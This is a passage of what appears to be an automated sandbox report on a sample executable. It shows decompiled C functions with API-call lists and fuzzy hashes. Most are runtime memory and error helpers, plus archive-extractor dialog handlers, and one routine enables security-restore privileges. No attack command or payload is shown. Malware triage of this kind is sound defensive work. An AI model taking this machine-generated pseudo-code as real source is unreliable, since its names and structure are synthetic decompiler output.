                						_t25 = E00CC7A8A(_t19, _t7);
                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                							_t13 = 0;
                						} else {
                							_t13 = _t25;
                							_t25 = 0;
                						}
                						E00CC7A50(_t25);
                					}
                				}
                				if(_t27 != 0) {
                					FreeEnvironmentStringsW(_t27);
                				}
                				return _t13;
                			}













                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 00CCABAF
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CCABD2
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CCABF8
                • _free.LIBCMT ref: 00CCAC0B
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCAC1A
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 4e4ece1beee9ed1b48d4ece04c962451c1eee2e6787751a286d302d9d44bd883
                • Instruction ID: 6dcd8d39ed0a29a60cd9b5e2d224ca6f95919c736c0523c9988893ab44a75e0a
                • Opcode Fuzzy Hash: 4e4ece1beee9ed1b48d4ece04c962451c1eee2e6787751a286d302d9d44bd883
                • Instruction Fuzzy Hash: D30188726026197F23211677EC8CF7F7A6DDFC6B64315411EF914D2141DE628E0295B1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00CC859A(void* __ecx, void* __edx) {
                				void* __esi;
                				intOrPtr _t2;
                				void* _t4;
                				void* _t10;
                				void* _t11;
                				void* _t13;
                				void* _t16;
                				long _t17;
                
                				_t11 = __ecx;
                				_t17 = GetLastError();
                				_t10 = 0;
                				_t2 =  *0xcdd6ac; // 0x6
                				_t20 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t16 = E00CC7B1B(_t11, 1, 0x364);
                					_pop(_t13);
                					if(_t16 != 0) {
                						_t4 = E00CC9BA9(_t13, _t17, __eflags,  *0xcdd6ac, _t16);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00CC8388(_t13, _t16, 0xd00418);
                							E00CC7A50(_t10);
                							__eflags = _t16;
                							if(_t16 != 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t16);
                							goto L4;
                						}
                					} else {
                						_push(_t10);
                						L4:
                						E00CC7A50();
                						L8:
                						SetLastError(_t17);
                					}
                				} else {
                					_t16 = E00CC9B53(_t11, _t17, _t20, _t2);
                					if(_t16 != 0) {
                						L9:
                						SetLastError(_t17);
                						_t10 = _t16;
                					} else {
                						goto L2;
                					}
                				}
                				return _t10;
                			}












                APIs
                • GetLastError.KERNEL32(?,?,?,00CC7ED1,00CC7B6D,?,00CC8544,00000001,00000364,?,00CC2E0F,?,?,00CE00E0), ref: 00CC859F
                • _free.LIBCMT ref: 00CC85D4
                • _free.LIBCMT ref: 00CC85FB
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC8608
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC8611
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 985f4ac6a25bbe25e22ad36bc83d4df3003767838b3e2f8b65eca8d604ac88fa
                • Instruction ID: 8899198092ad7893a66b62d140c3cd210a51b0500aba0ab5c25ad7e5e86108c7
                • Opcode Fuzzy Hash: 985f4ac6a25bbe25e22ad36bc83d4df3003767838b3e2f8b65eca8d604ac88fa
                • Instruction Fuzzy Hash: AD01F476245A002BE3123735EC85F2F2659DBD1761726012EF82AD3293EF71CE0AA168
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00CB03C7(void* __ecx) {
                				intOrPtr _v16;
                				void* __ebp;
                				int _t16;
                				void** _t21;
                				long* _t25;
                				void* _t28;
                				void* _t30;
                				intOrPtr _t31;
                
                				_t22 = __ecx;
                				_push(0xffffffff);
                				_push(E00CD1161);
                				_push( *[fs:0x0]);
                				 *[fs:0x0] = _t31;
                				_t28 = __ecx;
                				E00CB0697(__ecx);
                				_t25 = 0;
                				 *((char*)(__ecx + 0x314)) = 1;
                				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
                				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
                					_t21 = _t28 + 4;
                					do {
                						E00CB04BA(_t22, _t30,  *_t21);
                						CloseHandle( *_t21);
                						_t25 = _t25 + 1;
                						_t21 =  &(_t21[1]);
                					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
                				}
                				DeleteCriticalSection(_t28 + 0x320);
                				CloseHandle( *(_t28 + 0x318));
                				_t16 = CloseHandle( *(_t28 + 0x31c));
                				 *[fs:0x0] = _v16;
                				return _t16;
                			}












                APIs
                  • Part of subcall function 00CB0697: ResetEvent.KERNEL32(?), ref: 00CB06A9
                  • Part of subcall function 00CB0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CB06BD
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CB03FB
                • CloseHandle.KERNEL32(?,?), ref: 00CB0415
                • DeleteCriticalSection.KERNEL32(?), ref: 00CB042E
                • CloseHandle.KERNEL32(?), ref: 00CB043A
                • CloseHandle.KERNEL32(?), ref: 00CB0446
                  • Part of subcall function 00CB04BA: WaitForSingleObject.KERNEL32(?,000000FF,00CB05D9,?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04C0
                  • Part of subcall function 00CB04BA: GetLastError.KERNEL32(?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04CC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: b9667f4589e17406f991c6b79822bbf0b147a0b1b98abd852233d5a3f86e82b2
                • Instruction ID: 86c34954bf6d07da7b66bf6e81ed2480447740a8d143a22274fdc16efc5bb910
                • Opcode Fuzzy Hash: b9667f4589e17406f991c6b79822bbf0b147a0b1b98abd852233d5a3f86e82b2
                • Instruction Fuzzy Hash: A701B172000B04EBC7229B68DC84BCBBBE9FB58710F00452AF66B92160CB757944CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CCB461(intOrPtr* _a4) {
                				intOrPtr _t6;
                				intOrPtr* _t21;
                				void* _t23;
                				void* _t24;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t21 = _a4;
                				if(_t21 != 0) {
                					_t23 =  *_t21 -  *0xcddd50; // 0xcddd44
                					if(_t23 != 0) {
                						E00CC7A50(_t7);
                					}
                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xcddd54; // 0xd0088c
                					if(_t24 != 0) {
                						E00CC7A50(_t8);
                					}
                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xcddd58; // 0xd0088c
                					if(_t25 != 0) {
                						E00CC7A50(_t9);
                					}
                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xcddd80; // 0xcddd48
                					if(_t26 != 0) {
                						E00CC7A50(_t10);
                					}
                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                					_t27 = _t6 -  *0xcddd84; // 0xd00890
                					if(_t27 != 0) {
                						return E00CC7A50(_t6);
                					}
                				}
                				return _t6;
                			}











                APIs
                • _free.LIBCMT ref: 00CCB479
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CCB48B
                • _free.LIBCMT ref: 00CCB49D
                • _free.LIBCMT ref: 00CCB4AF
                • _free.LIBCMT ref: 00CCB4C1
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: d61dffd268737e5e5867d60f475ed3e1fe7903912d0700471c0cbeb821b9634b
                • Instruction ID: aa50c62218b9e825f1dd436123304a6069f4d79d3207b730edbcbbffb2c186ed
                • Opcode Fuzzy Hash: d61dffd268737e5e5867d60f475ed3e1fe7903912d0700471c0cbeb821b9634b
                • Instruction Fuzzy Hash: 15F01232909600ABCA64DBA5E886F1FB7DEEE00710B64580EF05FE7511C734FE80DA64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00CC75DB(signed int __ecx) {
                				intOrPtr _t7;
                
                				asm("lock xadd [eax], ecx");
                				if((__ecx | 0xffffffff) == 0) {
                					_t7 =  *0xcddd40; // 0xf124e8
                					if(_t7 != 0xcddb20) {
                						E00CC7A50(_t7);
                						 *0xcddd40 = 0xcddb20;
                					}
                				}
                				E00CC7A50( *0xd00410);
                				 *0xd00410 = 0;
                				E00CC7A50( *0xd00414);
                				 *0xd00414 = 0;
                				E00CC7A50( *0xd00860);
                				 *0xd00860 = 0;
                				E00CC7A50( *0xd00864);
                				 *0xd00864 = 0;
                				return 1;
                			}





                APIs
                • _free.LIBCMT ref: 00CC75F9
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CC760B
                • _free.LIBCMT ref: 00CC761E
                • _free.LIBCMT ref: 00CC762F
                • _free.LIBCMT ref: 00CC7640
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 3a962125343618e5cac41194f58dc1714a92f2f92b9ae054ce22e295b3f0b3a7
                • Instruction ID: 3ced608259afc79de8b0bb9fb752c4b02552554ef7d73f87e9bc66b25171fe93
                • Opcode Fuzzy Hash: 3a962125343618e5cac41194f58dc1714a92f2f92b9ae054ce22e295b3f0b3a7
                • Instruction Fuzzy Hash: 9CF01D70805718ABCB41AF25EC01B5E3FA5F704714B06621EF11A97371C7304601AEE9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E00CC6C73(void* __ecx, void* __edx, intOrPtr _a4) {
                				signed int _v8;
                				void* _v12;
                				char _v16;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t36;
                				struct HINSTANCE__* _t37;
                				struct HINSTANCE__* _t43;
                				intOrPtr* _t44;
                				intOrPtr* _t45;
                				CHAR* _t49;
                				struct HINSTANCE__* _t50;
                				void* _t52;
                				struct HINSTANCE__* _t55;
                				intOrPtr* _t59;
                				struct HINSTANCE__* _t64;
                				intOrPtr _t65;
                
                				_t52 = __ecx;
                				if(_a4 == 2 || _a4 == 1) {
                					E00CCA7B3(_t52);
                					GetModuleFileNameA(0, 0xd002b8, 0x104);
                					_t49 =  *0xd00868; // 0xf032f0
                					 *0xd00870 = 0xd002b8;
                					if(_t49 == 0 ||  *_t49 == 0) {
                						_t49 = 0xd002b8;
                					}
                					_v8 = 0;
                					_v16 = 0;
                					E00CC6D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
                					_t64 = E00CC6F0C(_v8, _v16, 1);
                					if(_t64 != 0) {
                						E00CC6D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                						if(_a4 != 1) {
                							_v12 = 0;
                							_push( &_v12);
                							_t50 = E00CCA2CE(_t49, 0, _t64, _t64);
                							if(_t50 == 0) {
                								_t59 = _v12;
                								_t55 = 0;
                								_t36 = _t59;
                								if( *_t59 == 0) {
                									L15:
                									_t37 = 0;
                									 *0xd0085c = _t55;
                									_v12 = 0;
                									_t50 = 0;
                									 *0xd00860 = _t59;
                									L16:
                									E00CC7A50(_t37);
                									_v12 = 0;
                									goto L17;
                								} else {
                									goto L14;
                								}
                								do {
                									L14:
                									_t36 = _t36 + 4;
                									_t55 =  &(_t55->i);
                								} while ( *_t36 != 0);
                								goto L15;
                							}
                							_t37 = _v12;
                							goto L16;
                						}
                						 *0xd0085c = _v8 - 1;
                						_t43 = _t64;
                						_t64 = 0;
                						 *0xd00860 = _t43;
                						goto L10;
                					} else {
                						_t44 = E00CC7ECC();
                						_push(0xc);
                						_pop(0);
                						 *_t44 = 0;
                						L10:
                						_t50 = 0;
                						L17:
                						E00CC7A50(_t64);
                						return _t50;
                					}
                				} else {
                					_t45 = E00CC7ECC();
                					_t65 = 0x16;
                					 *_t45 = _t65;
                					E00CC7DAB();
                					return _t65;
                				}
                			}






















                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dAkJsQr7A9.exe,00000104), ref: 00CC6CB3
                • _free.LIBCMT ref: 00CC6D7E
                • _free.LIBCMT ref: 00CC6D88
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\dAkJsQr7A9.exe
                • API String ID: 2506810119-2619454627
                • Opcode ID: 16a66f87db5eec41eb4d9486037dadb8b8fd9bebd022060bdf9fceff3aac41f3
                • Instruction ID: d65524a7d25aa4cf5a91812c044728ecb55fc4a953825fe9d74d3173aac3fc6c
                • Opcode Fuzzy Hash: 16a66f87db5eec41eb4d9486037dadb8b8fd9bebd022060bdf9fceff3aac41f3
                • Instruction Fuzzy Hash: 6A315071A04318BFDB21EF99D985F9EBBF8EB85310F10416EF41A97211D6709E41DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E00CA73B9(void* __ebx, void* __edx, void* __esi) {
                				void* _t26;
                				long _t32;
                				void* _t39;
                				void* _t42;
                				intOrPtr _t43;
                				void* _t52;
                				void* _t57;
                				void* _t58;
                				void* _t61;
                
                				_t57 = __esi;
                				_t52 = __edx;
                				_t42 = __ebx;
                				E00CBD870(E00CD1321, _t61);
                				E00CBD940();
                				 *((intOrPtr*)(_t61 - 0x20)) = 0;
                				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
                				 *((intOrPtr*)(_t61 - 0x18)) = 0;
                				 *((intOrPtr*)(_t61 - 0x14)) = 0;
                				 *((char*)(_t61 - 0x10)) = 0;
                				_t54 =  *((intOrPtr*)(_t61 + 8));
                				_push(0);
                				_push(0);
                				 *((intOrPtr*)(_t61 - 4)) = 0;
                				_push(_t61 - 0x20);
                				if(E00CA399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
                					if( *0xce0042 == 0) {
                						if(E00CA7A15(L"SeSecurityPrivilege") != 0) {
                							 *0xce0041 = 1;
                						}
                						E00CA7A15(L"SeRestorePrivilege");
                						 *0xce0042 = 1;
                					}
                					_push(_t57);
                					_t58 = 7;
                					if( *0xce0041 != 0) {
                						_t58 = 0xf;
                					}
                					_push(_t42);
                					_t43 =  *((intOrPtr*)(_t61 - 0x20));
                					_push(_t43);
                					_push(_t58);
                					_push( *((intOrPtr*)(_t61 + 0xc)));
                					if( *0xcdde80() == 0) {
                						if(E00CAB32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
                							L10:
                							E00CA6BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
                							_t32 = GetLastError();
                							E00CBE214(_t32);
                							if(_t32 == 5 && E00CAFC98() == 0) {
                								E00CA1567(_t61 - 0x6c, 0x18);
                								E00CB0A9F(_t61 - 0x6c);
                							}
                							E00CA6E03(0xce00e0, 1);
                						} else {
                							_t39 =  *0xcdde80(_t61 - 0x106c, _t58, _t43);
                							_t70 = _t39;
                							if(_t39 == 0) {
                								goto L10;
                							}
                						}
                					}
                				}
                				_t26 = E00CA159C(_t61 - 0x20);
                				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
                				return _t26;
                			}













                APIs
                • __EH_prolog.LIBCMT ref: 00CA73BE
                  • Part of subcall function 00CA399D: __EH_prolog.LIBCMT ref: 00CA39A2
                • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CA7485
                  • Part of subcall function 00CA7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7A24
                  • Part of subcall function 00CA7A15: GetLastError.KERNEL32 ref: 00CA7A6A
                  • Part of subcall function 00CA7A15: CloseHandle.KERNEL32(?), ref: 00CA7A79
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: e1d67518083d3637cb00a3e28aae02f63c31f2f5681624bc1b22160413452ab8
                • Instruction ID: bcdf8cc7d2a36f7724547c9a200d93052dd0a6d632f673159af877c767395e2c
                • Opcode Fuzzy Hash: e1d67518083d3637cb00a3e28aae02f63c31f2f5681624bc1b22160413452ab8
                • Instruction Fuzzy Hash: DE31FB71E04246AADF20EBA4DC41BEE7B78BF56308F044125F859A7152C7B44E44DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E00CB9B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
                				void* _t12;
                				void* _t16;
                				void* _t22;
                				WCHAR** _t24;
                				void* _t25;
                				intOrPtr _t27;
                				void* _t28;
                				struct HWND__* _t30;
                				signed short _t31;
                
                				_t24 = _a16;
                				_t31 = _a12;
                				_t30 = _a4;
                				_t27 = _a8;
                				if(E00CA12D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
                					L14:
                					__eflags = 1;
                					return 1;
                				}
                				_t28 = _t27 - 0x110;
                				if(_t28 == 0) {
                					_push( *_t24);
                					 *0xcffe38 = _t24;
                					L13:
                					SetDlgItemTextW(_t30, 0x66, ??);
                					goto L14;
                				}
                				if(_t28 != 1) {
                					L6:
                					return 0;
                				}
                				_t12 = (_t31 & 0x0000ffff) - 1;
                				if(_t12 == 0) {
                					GetDlgItemTextW(_t30, 0x66,  *( *0xcffe38), ( *0xcffe38)[1]);
                					_push(1);
                					L10:
                					EndDialog(_t30, ??);
                					goto L14;
                				}
                				_t16 = _t12 - 1;
                				if(_t16 == 0) {
                					_push(0);
                					goto L10;
                				}
                				if(_t16 == 0x65) {
                					_push(0);
                					_push(E00CAB943(__eflags,  *( *0xcffe38)));
                					_push( *( *0xcffe38));
                					_push(E00CADA42(_t25, 0x8e));
                					_t22 = E00CA10B0(_t30);
                					__eflags = _t22;
                					if(_t22 == 0) {
                						goto L14;
                					}
                					_push( *( *0xcffe38));
                					goto L13;
                				}
                				goto L6;
                			}













                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CB9C15
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CB9C2A
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CB9C3F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 2894bfa643c37db0f22838fed8b1d3790d6688e43fb314be67c51b65ad9518a0
                • Instruction ID: 89bcc7fcf8e7ca37d2734ed1d622eb9baa8c1b6e96e8396fa1385f489f9af675
                • Opcode Fuzzy Hash: 2894bfa643c37db0f22838fed8b1d3790d6688e43fb314be67c51b65ad9518a0
                • Instruction Fuzzy Hash: C0115133644111AFD6119FA89D49FAA7FA9EF4B700F140015F7029B2B2C7B29E42D72A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CACE52(void* __ebx, void* __ecx, void* __edi) {
                				void* __esi;
                				intOrPtr _t26;
                				signed int* _t30;
                				void* _t31;
                				void* _t34;
                				void* _t42;
                				void* _t44;
                				void* _t46;
                				void* _t48;
                				void* _t49;
                				void* _t50;
                
                				_t44 = __edi;
                				_t43 = __ecx;
                				_t42 = __ebx;
                				_t48 = _t49 - 0x64;
                				_t50 = _t49 - 0xac;
                				_t46 = __ecx;
                				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
                					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
                					 *((char*)(_t48 + 8)) = 0;
                					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
                					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
                						E00CB11FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
                					}
                					_t26 =  *((intOrPtr*)(_t48 + 0x70));
                					if(_t26 == 0) {
                						E00CAFA56(_t48 + 8, "s", 0x50);
                					} else {
                						_t34 = _t26 - 1;
                						if(_t34 == 0) {
                							_push(_t48 - 0x48);
                							_push("$%s");
                							goto L9;
                						} else {
                							if(_t34 == 1) {
                								_push(_t48 - 0x48);
                								_push("@%s");
                								L9:
                								_push(0x50);
                								_push(_t48 + 8);
                								E00CAD9DC();
                								_t50 = _t50 + 0x10;
                							}
                						}
                					}
                					_t16 = _t46 + 0x18; // 0x63
                					_t18 = _t46 + 0x14; // 0xf236b0
                					_t30 = E00CC4E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E00CACC88);
                					if(_t30 == 0) {
                						goto L1;
                					} else {
                						_t20 = 0xcdd158 +  *_t30 * 0xc; // 0xcd33e0
                						E00CC54E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
                						_t31 = 1;
                					}
                				} else {
                					L1:
                					_t31 = 0;
                				}
                				return _t31;
                			}















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                • Opcode ID: 6b5750811b860c320c2d7a3a32032aecc0b5653e1ee83bf2e51122e76caca5a2
                • Instruction ID: 292824e291c230cddc4629a5f952161074cafc771c772b7ce10ce5978b9b9de6
                • Opcode Fuzzy Hash: 6b5750811b860c320c2d7a3a32032aecc0b5653e1ee83bf2e51122e76caca5a2
                • Instruction Fuzzy Hash: B521907254030DEEDF21DFA4CC85FEE7BA8EB16704F044026FA2596192E371DA559B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00CBA0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                				short _v260;
                				void* __ebx;
                				void* _t15;
                				signed short _t24;
                				struct HWND__* _t28;
                				intOrPtr _t29;
                				void* _t30;
                
                				_t24 = _a12;
                				_t29 = _a8;
                				_t28 = _a4;
                				if(E00CA12D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
                					L10:
                					return 1;
                				}
                				_t30 = _t29 - 0x110;
                				if(_t30 == 0) {
                					SetDlgItemTextW(_t28, 0x67, _a16);
                					goto L10;
                				}
                				if(_t30 != 1) {
                					L5:
                					return 0;
                				}
                				_t15 = (_t24 & 0x0000ffff) - 1;
                				if(_t15 == 0) {
                					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
                					E00CAE90C(_t24, 0xcf5c00,  &_v260);
                					E00CAE957( &_v260, 0x80);
                					_push(1);
                					L7:
                					EndDialog(_t28, ??);
                					goto L10;
                				}
                				if(_t15 == 1) {
                					_push(0);
                					goto L7;
                				}
                				goto L5;
                			}











                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
